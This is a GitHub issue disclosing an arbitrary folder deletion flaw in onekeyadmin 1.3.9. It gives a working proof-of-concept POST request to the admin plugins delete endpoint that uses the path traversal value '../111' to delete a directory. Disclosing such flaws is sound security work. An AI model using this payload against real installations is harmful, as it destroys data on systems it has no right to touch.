Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Background arbitrary folder deletion vulnerability #3

Open
qbz95aaa opened this issue Jan 10, 2023 · 1 comment
Open

Background arbitrary folder deletion vulnerability #3

qbz95aaa opened this issue Jan 10, 2023 · 1 comment

Comments

@qbz95aaa
Copy link

qbz95aaa commented Jan 10, 2023

Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file delete
Vulnerability Details:
Vulnerability location
Vulnerability occurs in
app\admin\controller\plugins#delete method
image
Here the delDirAndFile method of use onekey\File# is called
image
Vulnerability recurrence
Conditions: background administrator rights
Next I will delete the E:\onekeyadmin-main\public\111\ directory
`POST /admin1/plugins/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json

{"name":"../111"}`
image

@qbz95aaa
Copy link
Author

find by Chaitin Security Research Lab

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant